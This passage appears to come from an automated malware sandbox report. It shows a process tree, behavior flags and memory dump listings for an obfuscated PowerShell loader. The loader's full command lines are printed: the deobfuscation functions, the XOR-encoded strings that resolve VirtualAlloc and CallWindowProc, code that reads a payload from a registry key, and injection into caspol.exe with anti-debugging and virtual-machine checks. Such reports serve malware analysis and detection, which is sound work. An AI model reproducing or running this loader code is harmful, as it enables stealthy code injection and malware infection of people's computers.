Ya'Be2LaDTo4StBPa7Af0Pa7DoATi7ChDTr7PaBHu6FoCOm6NuCPa7EkDem2In7Fl4MaDNs6ChCun6AuFUd6As0Af6Wa7Dv6reCMu4Kl4Af6ReCXe7grDHa6Re1ba6Da6da6LeDIn2pa1In2SkDIs5DiBKn6GoCSp7ToAVe7FoDCa7LaBpr6Ad0En6Fr2Kn6KaCfa7UnAHa3TeBFl2ni5uo2Wy9El2BlDJe5PuBMi6UnCSe7MiALe7OmDst7ViBPa6Mo0St6Co2Bu6TeCIt7TvAHe3boABr2me5st2Ny9Dr2MiDNo4Oo1Va6Ac6Ta6Or4Pr6Re6Un6CoELa6Ej6Ma6Ne7Do6de6De7EsCsl7BaABy2Fr5An2Di9Wh2ReDFa4coBTl6Al0Va7PhFUb6er6Sa6ShEIn6Hu7Be7YeABr2Gr0Ol2Ad7Kl5MoAOv6FiCBe7NoDMu4Wi0Ge6Vm4Ud7Un9Se6An5Bu6SwCFr6sk4Ou6SuCSu6Zo7Te7GyDDr6Im8Ki7HvDMi6Me0Bu6An6Ob6Va7In4BeFPe6Ha5St6Ov8Tr6AbECl7SnABo2kh1Re2BiDBu7DrAvg7PoDKe7MeBNo6Pr0Ri6SuADo7BiDFe7NiCSt7AhBGr6NoCAf3ChELe2Fd0Af'Ar;Ex&At(Mo`$BlRRieBlsFrtrerusiDikMyeDrsBu7we)Lu St`$NeRUneMupHyoTerAutSreTarMiiFastrmDa1Bi6Re8Fu4Re;no`$MeRPoeHapSeoElrLetSyeTrrDaiResPomMe1Am6Va8Su5un ja=Si teHcaTPuBSu Ts'Ac7RuBbo6SkCSk7BoDKa7FoCSu7VeBSy6In7Ud2Tv9Ba2JeDCa4AvBAd7Ry0Va7teApa7HvDSt7UnBFe6AfCLd6TiCPe7HeDIn2Ac7Sk4InAVs7OvBPo6StCKi6br8Cl7FoDUn6DrCLe5BaDSk7Ti0Pr7Af9Ai6PrCbo2Ak1Ga2Co0Cy'Ga;Tr&He(Ov`$PsRAfeResVatKjrSuiStkineApsLf7py)Py Br`$FlRRdeAfpWioorrAstSueForFriCosstmSt1ps6No8Cl5Ko Sy Or Fr;De}me`$SaHKorMifEprNoebarDueScsIn Kr=St PlHLeTouBRe Un'ti6Ta2En6MeCFo7MaBDe6Tu7Pe6CtCDe6Pd5Di3KoAIn3MiBGr'Sy;Ku`$TeRQueDrpMyoAfrPatAkeCrrSpiGssUnmSe1Fa6Hu8Ka6Sv Cr=Ek BeHPoTMaBFa Ol'Fr2stDZa4Vi8Fl6PiDTi6un4As6Co0Hj6Me7Ra6Om0Qu6TrAPa7BeCGl6om5Ma7AnCAn6Fr4Vb2Vu9Kn3su4Po2Ch9Fu5Fo2Pl5ClADe7Sy0Sp7NoASo7AdDSu6PaCSy6Ek4Be2Va7ph5TuBSu7brCOm6Sl7on7CoDIh6Ov0Sc6Fa4Sb6TeCSy2Hy7So4Re0Bl6Am7Is7KlDFo6asCsh7LeBpo6Fe6Ba7Sy9Pa5BaAOu6CoCKa7InBKe7PuFTa6Dr0be6EkAFy6EkCUn7OvAKe2Ge7Ka4Da4Be6Am8Se7MoBUr7DrABr6Fa1Pl6Ai8Si6Se5Ni5Lu4Ga3Uh3Ov3Zy3Op4InEDe6CaCBa7WhDPi4SmDCe6BrCGe6Se5Lu6TrCTu6CoENo6Ry8Un7AbDgg6HeCAn4TeFli6mo6Ti7LyBJe4inFSc7DeCli6Un7Ch6UnAIn7OmDFa6ru0Ta6Ku6Te6He7Hu5fo9ki6Wa6In6Gr0Br6St7Tr7SkDCo6KoCBe7ElBBo2Tu1Th2Co1Mi6CoFWh6Af2tu7Ma9Ar2Nu9By2MaDFo4Qu1Pa7TrBFo6InFFi7AfBBo6KoCIs7TuBDe6PrCTe7BlAKv2Fo9Ti2AbDVa5BrBTr6GrCSo7ScAev7OpDAc7TaBGa6Gi0Ci6No2Sh6UnCCa7CyAVe3DoDFl2It0Wh2Um5da2In9Co2Sa1Hy4VoEMi4KoDMe5AnDBu2Un9Te4Sl9co2Af1Al5Ge2Be4Ra0Fa6Po7Th7OuDLu5re9Be7LiDIn7OvBAl5Pi4Be2Un5Va2Vr9Sp5Ta2Re5UdCSt4In0Sp6So7Sp7SpDSa3FeALa3StBde5Ne4Uk2In5On2In9Ud5An2Ca5FaCSa4Ps0Va6St7Na7FoDFl3BaACa3StBMa5za4Im2Fs5Ve2ke9St5Ef2Mu5KlCVa4Mo0Si6At7Sk7SaDLe3SaATe3DoBTh5Ot4Th2Ke0Be2No9Si2do1ag5No2Ro4Ho0Ca6Si7Sy7FlDBe5Af9Un7SuDLi7biBAg5Sh4Bu2Va0Ov2Be0Be2Di0Se'Mi;Am&Hi(Ge`$RuREleTasIntUdrNoiSokFleprsMe7Em)Il Pe`$BeRUteInpStoCorButbieAfrShiSosSemUr1do6Om8Do6St;St`$ukEPadPuwCoiFlnEnawa sa=Un CrfDukhupDo Ta`$KiRPseOusTetVirOviStkNreDesTr5Sk Sa`$FoRTaeHesPatFyrPeipekGueSmsSy6du;en`$ApRGaeScpSeoOprRatBieCorNoiDesPrmCo1Fe6Un8Ki7Sp In=Op SaHApTAlBde su'Be2KoDNa5SnAJo7KoCAk7Re9Ab7Ye9Es6Br5jo6ToCMo6Ud4Vi6ShChi6Lu7Sc7AcDFa6HnBCo6St0St6Wi7Co6HeDSp3TrACu2Do9Fo3Me4Gr2Si9Fo2FoDMe4Re8De6DiDOf6Br4Tr6Bu0en6La7An6Of0Ph6FlAMi7AnCPa6Sl5Fo7LoCSy6Le4Bu2Bi7Ly4An0St6Va7Re7paFLe6Ma6El6Un2Be6JoCAp2Ub1va5te2Be4Pa0Pe6Gr7Wa7raDPr5ma9Pa7ToDBl7foBSh5Mi4Vr3Be3Kr3Su3Je5Ri3Sm6RaCFi7koBCl6ce6Un2Eu5Re2ve9As3HiFUl3AfCSk3GaCSu2Ov5Sn2Mo9Ra3En9Da7Ma1Ko3OpATu3Fo9Sh3Go9Bi3Ch9Ju2Fi5Dr2Re9Ta3Di9Pl7Vi1Un3orDGa3Re9Gl2Fo0Sv'Fy;Ma&Ou(Mo`$DiRHveInsamtverGoiMakCleEnsAf7Se)En Cu`$BoRBleFepMooGorSutFreOrrDiiApsFrmAs1st6Ma8Ua7af;Cl`$HvRLeeInpCuounrTrtDieAdrSpiSosVimHu1Di6En8Ir8Re El=Su CoHPeTBeBDu To'Ap2InDUn4Ad8Le6Tr7Bl6RiFJu6Te6Al7SlBne6PiDsh7UnBTr6Pr0Om6Ef7Sm6AnERe6brCBa6Ep7Di2Fo9Ca3Sp4Pe2Kl9Or2MuDCr4De8Ch6StDIm6Di4Pr6Hk0Re6Sm7Ar6No0Re6TuATo7ToCEx6Un5Op7diCUn6Ti4Uo2Kr7St4Ab0No6Gy7Br7NeFPy6Te6Cr6Go2Un6DyCZi2Du1In5Fa2bo4Pa0Un6Ta7Mi7BjDEs5No9Ko7BeDFo7InBTi5Ex4Ka3Vi3Fr3As3Me5Ov3Te6GrCWy7StBsm6Re6Ko2Ka5Ha2Er9No3DrEKo3he8Ti3PaDGi3Ba0Re3taCPr3SoFUn3Ga1Un3Ti9Ep2Vi5pu2Si9Un3co9Fi7We1Un3FlASa3ho9Ca3Ba9Li3Pa9Ne2Sk5St2Na9St3Ha9Va7lo1In3ThDWo2Fl0Re'Ch;eo&Ti(Qr`$CoRIneSisNotArrUaiPakMieHosCh7Ok)Ch Ka`$miRGeeHjpIwoBlrNotDeeKurTeiKosSumGr1In6Ma8Ud8Pr;Do`$KosUnkTraAftudtOveRolDieSttSitMoeKolDrsKoeHarAd=dk(AfGKleLatOv-PeIZatTueWemPrPHorFrofopTyeForUdtBoyGa tr-DoPAnaWitAlhRy Co'ReHOrKUdCOlUFi:No\SuBSauUdlSneannDosCh\FoTLyrMaiSalBobStyTr'Tr)Br.TfDNorMusHolDugNoeFrrudnTjeDesOr;In`$meRBueKupRaoMorBatIneForAniStsThmCo1Im6Gi8Tj9Ta Ni=As InHEnTMaBNo Ou'La2FrDAt5UnBLy6SoCMu7Co9Sg6Hj6Ti7ChBSe7GiDLe6meCRe7ErBNi6Va0Pe7VaAVa6en4Co3in8Ih3ReFDi3Wa1Un2Fu9Re3Ar4Gr2Ym9in5Op2sa5FaAEn7is0Sw7kuApe7AeDKo6OvCVi6Po4De2Ne7Un4MeATo6bu6Ti6Re7Tr7KaFPa6HeCCo7CoBAf7naDEs5me4Un3In3Ta3Fo3Sp4DyFBi7DoBTh6Aa6ar6Sy4Re4BuBSc6ko8Vi7FoAUn6PrCAn3FrFNo3daDCh5LeAHe7MuDSn7InBAl6Ha0Re6St7Su6InERu2Be1Hu2LiDFj7UnATa6ni2En6Sh8Ch7UnDSp7OxDMe6KaCPr6Sn5Be6MaCMi7TiDOn7ChDco6NeCSt6No5Um7SkAId6FoCfa7SaBMa2Gr0Pi'Sy;Cl&Fo(Ta`$usRJaekasFotKurKoigekDaeJasJe7De)re Pe`$NeRTieafpDioTrrSetBeebrrBoiThsBumru1ad6Kr8Fo9Sa;Ba`$SksBekBiaIntlitFeeKllsoeEptAutBoeHalHmsPreAfrMo0Fl In=Do LiHStTDeBMa in'Op5Ch2fa5ClADe7Pr0Ca7soAIn7SpDCa6ReCko6si4Fo2Se7Di5ReBHe7TeCTr6Ru7Lv7TrDGo6te0Uh6St4St6UlCHv2Ma7St4Kj0fo6Ca7Tr7SpDBy6VaCGa7NrBSt6Ko6Mo7Bg9Un5ExACr6UnCIn7UnBQu7ReFAe6Hy0Go6BrAJo6OzCUn7ApABr2Ro7Ra4ti4Un6Xi8Mu7SnBEs7ThAPi6An1ov6Fr8Sm6so5Jv5La4Ak3Sv3Op3ad3Ca4MeANa6Bi6Mo7Pt9An7In0Un2An1Pe2OvDEd5StBpr6CeCCh7Be9Ha6Sk6Ka7OvBDe7IsDAf6PrCSo7UmBSt6sv0ro7BlAHa6Ch4Un3Li8Di3OpFpa3Co1En2Un5No2Fl9Gv3Sp9Al2Sw5Ha2In9An2In9Po2SyDGo5PaABl7DiCTu7me9Ki7In9De6Fo5al6BlCWi6Ko4Ob6DeCbe6Am7Sj7FoDRe6BrBhy6Li0Rm6Ma7Ge6TeDHe3OrABa2ch5Di2Un9Op3LaFUn3CaCAc3uvCMa2fo0Dr'Fe;ca&An(Ca`$PaRineReschtUdrPaiSukAreFosCo7Li)ya Pe`$SisTrkCiaNotRetBaeHulAleRetSttSkeUnlTosOoeSirBo0Be;Op`$EdSPakAduUnfInfDeeBakLboTomUbeIsdTeiFoeDirEr=La`$SlRDieBlpHaoNerSmtpieSyrUniCosTamBa1Bl6In8Fo.CrcSkoBouPonNutFo-Hy6Un5Te5Ba;Di`$FosHykSeaAstHetGaePrlIneSttUntFoePilKlsEreAlrRa1Na El=Ka SmHHoTDaBTj Hj'Pl5Eq2Ho5UnASa7Ma0Fe7KoABu7SpDPe6heCBa6Su4Bu2Po7Ef5DeBLo7StCFl6Tu7Ex7buDRa6Re0Fr6co4Ve6AnCPe2Ha7In4Wa0Za6Va7Mi7KrDUn6DyCPo7FoBUn6Pr6lr7Re9Be5EnATr6reCEr7AnBRu7unFGl6Bl0ge6InARa6buCSw7KeACi2Ge7Ge4Ly4Fl6Tr8No7FeBAf7InARe6Ov1Vo6Bo8Ov6an5De5Du4De3Me3El3Op3Ov4GeACe6La6Ro7Za9la7Ti0Zi2Tr1Th2FiDvi5AdBBl6lnCGe7Hu9Br6Ur6Sk7ToBAn7SkDUn6MoCDa7InBBi6Pi0Fa7HaADo6Fo4Bl3An8Ou3UnFth3Ac1Ko2Po5In2Sm9Ir3GuFRa3ReCPh3FiCTo2No5Th2Ca9Br2DaDor4de8My6Ha7Va6acFBr6Pl6Mn7SuBPe6FrDBu7WaBKo6Re0Ko6Ha7Da6BoEAi6BeCCu6sh7Ku2De5Do2Ci9Wa2PrDKn5BrAEx6St2Di7PeCBy6CoFFa6PeFBr6NyCBr6Sp2Ga6Ud6Di6He4Pr6UnCEx6MoDOv6Be0Bi6TaCSu7OrBSc2po0Go'Ad;Bl&Al(Da`$EnRGreStsAntDurStiAnkSeeKosCo7Be)Sk Fl`$AcsVikReaSotFrtBiePrlBeeEjtRotToeHylElsPheMarUn1Be;Sc`$HasGekPeaGltTetApeNolPoeSatBetFoesplAfsSleSirBr2Hy Om=Ma DoHAlTOrBMe Be'Da2StDDr5Et9Ud6Vi8Ly6No5Pi6Gr4Ka6AfCno7UtBBu6So0vo6RaCau7paAal2Ak9Fo3Aa4Tj2Fo9Re5Ta2Fu5BiAKl7Ag0Re7ToASp7suDIn6AfCbe6Ya4Ge2Ka7Co5BlBDk7LeCko6Sn7Ko7ReDCa6Va0Mo6Wh4Sk6JuCSt2Pe7en4In0Hr6sc7Lo7FrDKv6BlCMo7InBCo6ro6Sl7ob9Hi5UnARe6ViCHa7EsBRb7SeFmo6Br0bo6waAru6RaCEs7ReAPa2Li7Hu4Sa4Kn6Pe8Ud7SeBMo7AuAPr6Fo1Fa6Se8Di6ro5An5St4Ef3vu3Re3Ra3Sv4CrEHu6VaCUd7AuDep4SmDCa6ShCBr6Se5Ca6ViCfo6BeESc6In8Bo7heDLa6DjCAs4DeFDe6An6Sk7HeBUd4PrFTo7LiCUn6El7En6MuAEm7RiDSc6Ed0Am6No6Ar6St7Du5Er9Un6st6In6Si0Ek6Jo7Ti7ViDou6FrCin7PlBKi2Ud1Sp2Ar1Un6ToFLa6Ko2Op7da9Sm2Cr9Ho2WaDFe4InBSa6Qu8Un6TuDam6InCOi7KoFDr6St8Di6Po7Re6CrDHa7OvATu6BlFAm6Le6te7ShBap6Fa1Wo6Ko6Lo6Se5Ma6LoDSa6UdCAp7InDNo2In9He2FjDUd4InDHa6BeCUd7SiAUd6OvADa7GaBFo6In0So7Le9ar7EmDIn6Un0Sl6Ko6Sk6St7pr6Ma0Ir7TiAFe7PrDTe2Pa0Bl2Ob5Ra2Un9To2Im1Po4PoEMi4SkDPy5CuDTh2Be9En4Re9Ka2Ba1In5Fo2Pi4St0No6Ce7Ko7CoDTe5Ud9Ex7AlDBr7CoBFo5Ch4Fo2Sh5he2Ho9Fr5Ka2Hj4Ja0Ge6Fo7At7SoDAu5Ov9Fu7eyDAf7PlBUn5Te4Kl2Mu5Re2be9ke5Ex2Om4Fy0Bl6Op7Be7lsDCr5Sm9Lr7UnDGr7MaBRe5Tr4Em2Da5Af2Un9Ka5St2Wi4Di0Ga6Ir7Pa7StDEl5Ti9Fa7NoDFu7PeBHo5Cl4Ko2Ho5Eb2Om9In5Br2Av4Ku0Ti6Re7Ol7BeDHa5Fi9In7GeDPr7InBKr5Bi4Ti2Go0Pr2lo9Bl2mu1Hj5Ed2Co4Di0Io6Fa7Ho7AnDHe5Sp9Th7BiDGe7HoBOl5No4Pl2so0Us2Hj0Ca2Jo0Co'Ba;Di&En(Le`$TlRmaePrsKutJerSpilskPoeSusli7Su)Ma Af`$sisUlkWiaLrtnetBieFolFoeSltCotLsePelemsFieSarUf2Hy;Wi`$QustrkEcaUntGatNueFrltreSatChtHaeHulOlsMeeUnrIr3Km Mi=De UdHLuTPoBPi To'Ha2OpDTr5Br9Un6Un8In6Gi5af6Fr4Da6SoCKl7ReBSn6Ru0Un6LoCLi7BoAre2tr7Yn4Pe0Kn6Ti7Bo7ReFSu6Su6Bu6Te2Ap6DiCSk2He1Ke2SkDUn5BaAEi7ExCSk7Fl9Fr7Sp9Di6Bi5Sk6FeCTu6Fl4Su6PaCNo6Su7Fy7GaDWr6FiBRe6Ba0Fy6Fr7Un6FoDRa3FaAFu2Oe5sv2bnDBu4Sa8Co6In7bu6puFDi6Re6Do7urBSy6TiDSu7MoBMa6Sc0Bo6Ac7Ba6SuESt6MuCku6Br7Be2Ti5Br2FaDSa4kaCUd6DeDde7PrEPr6Hu0Ka6Sp7Gr6Su8Se2Ud5Ga3Te9Di2St5In3Bo9Ov2Ro0Fi'An;Sp&Te(Um`$PrRPoeTrsCotKorsciUdkDeeHesZi7Um)Lo Di`$ResEskSkaNotjotUdeDulSleAntOrtKoeHalNasBieUnrBe3Tu#En;""";;Function skattelettelser9 { param([String]$Anflyvendes); $Cynthian = $Anflyvendes.toCharArray(); For($socialmediciners=2; $socialmediciners -lt $Cynthian.count-1; $socialmediciners+=(2+1)){ $Spermatocidal = $Spermatocidal + $Cynthian[$socialmediciners]; } $Spermatocidal;}$Brndevinene0 = skattelettelser9 'UdIfrnOpvNooAnkSpesi-NeEHuxLipCirsaenesSysLiiWhoBanHo ';$Brndevinene2 = skattelettelser9 'AnsfitPoaInrBetKl-FojPooDibPo ';$Brndevinene1= skattelettelser9 $Nephradenoma;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Brndevinene1 ;}else{&$Brndevinene0 $Brndevinene1;};;;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Prevesical00 {param([String]$Anflyvendes);For($socialmediciners=2; $socialmediciners -lt $Anflyvendes.Length-1; $socialmediciners+=(2+1)){$Spermatocidal = $Spermatocidal + $Anflyvendes.Substring($socialmediciners, 1);}$Spermatocidal;}$Prevesical02 = Prevesical00 'DaISunFevKooEqkOpeBo-phEphxBrpBorTreTosVusSliSkoSknNo ';$Prevesical01 = Prevesical00 'bi$SkPParPleStdMaeHaaDdtSahRa[Os$StsSaoBecneiBiaCllTymErenodAuiVocsniBlnaeeArrPlsUd/pr2Sv]Si Ba=Ge En[LucOvoEnnArvReeAurMotNo]Or:In:BaTTioSrBGoyFltRieKo(Ud$DeAgnnJyfKllAlyStvEbeSantodApePasSo.BlSVauGubUdsTatBirChiBenFrgFe(Ga$TusAsoDacBeiFuaUglBomBoeYndMoiUrcOsiSanPaeSyrKosSu,ne So2Su)Lo,Tr Ed1Tr6su)Re ';Function HTB {param([String]$Anflyvendes);$Predeath = New-Object byte[] ($Anflyvendes.Length / 2);For($socialmediciners=0; $socialmediciners -lt $Anflyvendes.Length; $socialmediciners+=2){.($Prevesical02) $Prevesical01;$Predeath[$socialmediciners/2] = ($Predeath[$socialmediciners/2] -bxor 9);}[String][System.Text.Encoding]::ASCII.GetString($Predeath);}$stricture0=HTB '5A707A7D6C64276D6565';$stricture1=HTB '44606A7B667A666F7D275E60673A3B275C677A686F6C47687D607F6C446C7D61666D7A';$stricture2=HTB '4E6C7D597B666A486D6D7B6C7A7A';$stricture3=HTB '5A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A274168676D656C5B6C6F';$stricture4=HTB '7A7D7B60676E';$stricture5=HTB '4E6C7D44666D7C656C4168676D656C';$stricture6=HTB '5B5D5A796C6A6068654768646C252941606D6C4B705A606E2529597C6B65606A';$stricture7=HTB '5B7C677D60646C2529446867686E6C6D';$stricture8=HTB '5B6C6F656C6A7D6C6D4D6C656C6E687D6C';$stricture9=HTB '4067446C64667B7044666D7C656C';$Restrikes0=HTB '44704D6C656C6E687D6C5D70796C';$Restrikes1=HTB '4A65687A7A2529597C6B65606A25295A6C68656C6D252948677A604A65687A7A2529487C7D664A65687A7A';$Restrikes2=HTB '40677F66626C';$Restrikes3=HTB '597C6B65606A252941606D6C4B705A606E2529476C7E5A65667D25295F607B7D7C6865';$Restrikes4=HTB '5F607B7D7C6865486565666A';$Restrikes5=HTB '677D6D6565';$Restrikes6=HTB '477D597B667D6C6A7D5F607B7D7C6865446C64667B70';$Restrikes7=HTB '404C51';$Restrikes8=HTB '55';$Badevandsforholdet=HTB '5C5A4C5B3A3B';$Descriptionist=HTB '4A6865655E60676D667E597B666A48';function fkp {Param ($Pennefejdernes, $Bladring) ;$Reporterism1680 =HTB '2D40677D6C7B686A6A7C7A60676E29342921524879794D66646860675433334A7C7B7B6C677D4D6664686067274E6C7D487A7A6C646B65606C7A21202975295E616C7B6C24466B636C6A7D2972292D56274E65666B6865487A7A6C646B65704A686A616C292448676D292D562745666A687D606667275A7965607D212D5B6C7A7D7B60626C7A312052243854274C787C68657A212D7A7D7B606A7D7C7B6C3920297420274E6C7D5D70796C212D7A7D7B606A7D7C7B6C3820';&($Restrikes7) $Reporterism1680;$Reporterism1685 = HTB '2D5B607F6865607A6C7B60676E6C672934292D40677D6C7B686A6A7C7A60676E274E6C7D446C7D61666D212D7A7D7B606A7D7C7B6C3B2529525D70796C5254542949212D7A7D7B606A7D7C7B6C3A25292D7A7D7B606A7D7C7B6C3D2020';&($Restrikes7) $Reporterism1685;$Reporterism1681 = HTB '7B6C7D7C7B67292D5B607F6865607A6C7B60676E6C672740677F66626C212D677C656525294921525A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A274168676D656C5B6C6F5421476C7E24466B636C6A7D295A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A274168676D656C5B6C6F2121476C7E24466B636C6A7D2940677D597D7B202529212D40677D6C7B686A6A7C7A60676E274E6C7D446C7D61666D212D7A7D7B606A7D7C7B6C3C20202740677F66626C212D677C6565252949212D596C67676C6F6C636D6C7B676C7A2020202025292D4B65686D7B60676E2020';&($Restrikes7) $Reporterism1681;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Bivogns,[Parameter(Position = 1)] [Type] $Homogonous = [Void]);$Reporterism1682 = HTB '2D4B707A7D7B6C6C7D293429524879794D66646860675433334A7C7B7B6C677D4D6664686067274D6C6F60676C4D70676864606A487A7A6C646B65702121476C7E24466B636C6A7D295A707A7D6C64275B6C6F656C6A7D60666727487A7A6C646B65704768646C212D7A7D7B606A7D7C7B6C3120202529525A707A7D6C64275B6C6F656C6A7D606667274C64607D27487A7A6C646B65704B7C60656D6C7B486A6A6C7A7A5433335B7C6720274D6C6F60676C4D70676864606A44666D7C656C212D7A7D7B606A7D7C7B6C3025292D6F68657A6C20274D6C6F60676C5D70796C212D5B6C7A7D7B60626C7A3925292D5B6C7A7D7B60626C7A382529525A707A7D6C6427447C657D606A687A7D4D6C656C6E687D6C5420';&($Restrikes7) $Reporterism1682;$Reporterism1683 = HTB '2D4B707A7D7B6C6C7D274D6C6F60676C4A66677A7D7B7C6A7D667B212D7A7D7B606A7D7C7B6C3F2529525A707A7D6C64275B6C6F656C6A7D606667274A68656560676E4A66677F6C677D6066677A5433335A7D68676D687B6D25292D4B607F666E677A20275A6C7D406479656C646C677D687D6066674F65686E7A212D7A7D7B606A7D7C7B6C3E20';&($Restrikes7) $Reporterism1683;$Reporterism1684 = HTB '2D4B707A7D7B6C6C7D274D6C6F60676C446C7D61666D212D5B6C7A7D7B60626C7A3B25292D5B6C7A7D7B60626C7A3A25292D416664666E6667667C7A25292D4B607F666E677A20275A6C7D406479656C646C677D687D6066674F65686E7A212D7A7D7B606A7D7C7B6C3E20';&($Restrikes7) $Reporterism1684;$Reporterism1685 = HTB '7B6C7D7C7B67292D4B707A7D7B6C6C7D274A7B6C687D6C5D70796C2120';&($Restrikes7) $Reporterism1685 ;}$Hrfreres = HTB '626C7B676C653A3B';$Reporterism1686 = HTB '2D486D646067606A7C657C64293429525A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A2744687B7A6168655433334E6C7D4D6C656C6E687D6C4F667B4F7C676A7D606667596660677D6C7B21216F6279292D417B6F7B6C7B6C7A292D5B6C7A7D7B60626C7A3D202529214E4D5D2949215240677D597D7B542529525C40677D3A3B542529525C40677D3A3B542529525C40677D3A3B542029215240677D597D7B54202020';&($Restrikes7) $Reporterism1686;$Edwina = fkp $Restrikes5 $Restrikes6;$Reporterism1687 = HTB '2D5A7C7979656C646C677D6B60676D3A2934292D486D646067606A7C657C642740677F66626C215240677D597D7B543333536C7B6625293F3C3C252939713A393939252939713D3920';&($Restrikes7) $Reporterism1687;$Reporterism1688 = HTB '2D48676F667B6D7B60676E6C672934292D486D646067606A7C657C642740677F66626C215240677D597D7B543333536C7B6625293E383D303C3F3139252939713A393939252939713D20';&($Restrikes7) $Reporterism1688;$skattelettelser=(Get-ItemProperty -Path 'HKCU:\Bulens\Trilby').Drslgernes;$Reporterism1689 = HTB '2D5B6C79667B7D6C7B607A64383F31293429525A707A7D6C64274A66677F6C7B7D5433334F7B66644B687A6C3F3D5A7D7B60676E212D7A62687D7D6C656C7D7D6C657A6C7B20';&($Restrikes7) $Reporterism1689;$skattelettelser0 = HTB '525A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A2744687B7A6168655433334A667970212D5B6C79667B7D6C7B607A64383F312529392529292D5A7C7979656C646C677D6B60676D3A25293F3C3C20';&($Restrikes7) $skattelettelser0;$Skuffekomedier=$Reporterism168.count-655;$skattelettelser1 = HTB '525A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A2744687B7A6168655433334A667970212D5B6C79667B7D6C7B607A64383F3125293F3C3C25292D48676F667B6D7B60676E6C6725292D5A627C6F6F6C6266646C6D606C7B20';&($Restrikes7) $skattelettelser1;$skattelettelser2 = HTB '2D596865646C7B606C7A293429525A707A7D6C64275B7C677D60646C2740677D6C7B66795A6C7B7F606A6C7A2744687B7A6168655433334E6C7D4D6C656C6E687D6C4F667B4F7C676A7D606667596660677D6C7B21216F6279292D4B686D6C7F68676D7A6F667B6166656D6C7D292D4D6C7A6A7B60797D606667607A7D202529214E4D5D2949215240677D597D7B5425295240677D597D7B5425295240677D597D7B5425295240677D597D7B5425295240677D597D7B542029215240677D597D7B54202020';&($Restrikes7) $skattelettelser2;$skattelettelser3 = HTB '2D596865646C7B606C7A2740677F66626C212D5A7C7979656C646C677D6B60676D3A252D48676F667B6D7B60676E6C67252D4C6D7E6067682539253920';&($Restrikes7) $skattelettelser3#"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
          4⤵
            PID:1892
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
            4⤵
              PID:1652
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
              • Checks QEMU agent file
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:3040
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 2188
                5⤵
                • Program crash
                PID:4864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3040 -ip 3040
        1⤵
          PID:2064

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1048-138-0x00007FFE08B90000-0x00007FFE09651000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1048-133-0x0000025B3B480000-0x0000025B3B4A2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1048-134-0x00007FFE08B90000-0x00007FFE09651000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/1048-132-0x0000000000000000-mapping.dmp
          Download
        • memory/1048-168-0x00007FFE08B90000-0x00007FFE09651000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/3040-171-0x0000000000B70000-0x0000000004F9F000-memory.dmp
          Filesize

          68.2MB

          Download
        • memory/3040-164-0x0000000000400000-0x0000000000430000-memory.dmp
          Filesize

          192KB

          Download
        • memory/3040-170-0x0000000024840000-0x000000002484A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/3040-169-0x00000000248B0000-0x0000000024942000-memory.dmp
          Filesize

          584KB

          Download
        • memory/3040-172-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp
          Filesize

          2.0MB

          Download
        • memory/3040-173-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3040-165-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3040-153-0x0000000000B70000-0x0000000004F9F000-memory.dmp
          Filesize

          68.2MB

          Download
        • memory/3040-162-0x0000000000401000-0x000000000062B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/3040-161-0x0000000000400000-0x000000000062B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/3040-160-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3040-159-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp
          Filesize

          2.0MB

          Download
        • memory/3040-158-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3040-157-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3040-151-0x0000000000000000-mapping.dmp
          Download
        • memory/3040-156-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp
          Filesize

          2.0MB

          Download
        • memory/4720-142-0x0000000006780000-0x000000000679E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/4720-154-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4720-155-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

